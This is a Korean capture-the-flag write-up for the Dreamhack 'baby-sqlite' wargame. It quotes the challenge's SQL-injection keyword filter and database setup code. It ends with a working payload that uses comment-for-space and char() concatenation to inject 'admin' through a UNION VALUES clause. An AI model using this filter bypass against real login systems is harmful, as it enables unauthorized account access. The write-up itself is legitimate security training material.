[Dreamhack] Level 2: baby-sqlite

1. 문제 

https://dreamhack.io/wargame/challenges/1

baby-sqlite

2. 해결 과정

로그인을 하기 위해서는 uid,upw 값을 입력해야 한다. (모두 소문자로 입력됨) 

level값은 9로 하드코딩되어있다. 

SQL Injection 공격을 방어하기 위해 각 입력값에 모두 필터링을 걸어둔다. 

•  [ , ]: 특정 SQL 문법에 영향을 줄 수 있는 문자.
• ,: SQL 명령어에서 여러 값을 구분하는 데 사용.
• admin: 관리자 계정과 관련된 입력을 제한.
• select: 데이터를 조회할 때 사용되는 SQL 명령어.
• ', ": SQL 문자열을 구분하는 데 사용.
• \t,  \n,  \r: 여러 줄에 걸친 SQL 문을 구성할 때 사용할 수 있는 특수 문자.
• 백스페이스 \x08, 탭 \x09, 널 문자 \x00, 수직 탭 \x0b, 캐리지 리턴 \x0d: 데이터 처리에 영향을 줄 수 있는 다양한 비인쇄 제어 문자.
• 공백 : SQL 문에서 여러 구성 요소를 구분하는 데 사용되는 기본 문자.

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')

    uid = request.form.get('uid', '').lower()
    upw = request.form.get('upw', '').lower()
    level = request.form.get('level', '9').lower()

    sqli_filter = ['[', ']', ',', 'admin', 'select', '\'', '"', '\t', '\n', '\r', '\x08', '\x09', '\x00', '\x0b', '\x0d', ' ']
    for x in sqli_filter:
        if uid.find(x) != -1:
            return 'No Hack!'
        if upw.find(x) != -1:
            return 'No Hack!'
        if level.find(x) != -1:
            return 'No Hack!'

 

코드는 실행되자마자 dream.cometure,9의 값의 데이터를 테이블에 삽입한다. 

if __name__ == '__main__':
    os.system('rm -rf %s' % DATABASE)
    with app.app_context():
        conn = get_db()
        conn.execute('CREATE TABLE users (uid text, upw text, level integer);')
        conn.execute("INSERT INTO users VALUES ('dream','cometrue', 9);")
        conn.commit()

 

로그인창에 dream, cometrue를 입력하면 "Good!"이라는 문자열이 출력된다. 

 

호출문은 아래와 같다. 

입력값을 burp suite를 통해 조작하여 쿼리를 호출해볼 것이다.

SELECT uid FROM users WHERE uid='{uid}' and upw='{upw}' and level={level};

 

a, a를 입력하면 level은 뜨지 않는다. (9로 설정되어 있고 따로 입력받지 않음)

따라서, 직접 입력해주어야 한다. 

uid=a&upw=a&level=1/**/union/**/values(char(97)||char(100)||char(109)||char(105)||char(110))

 

성공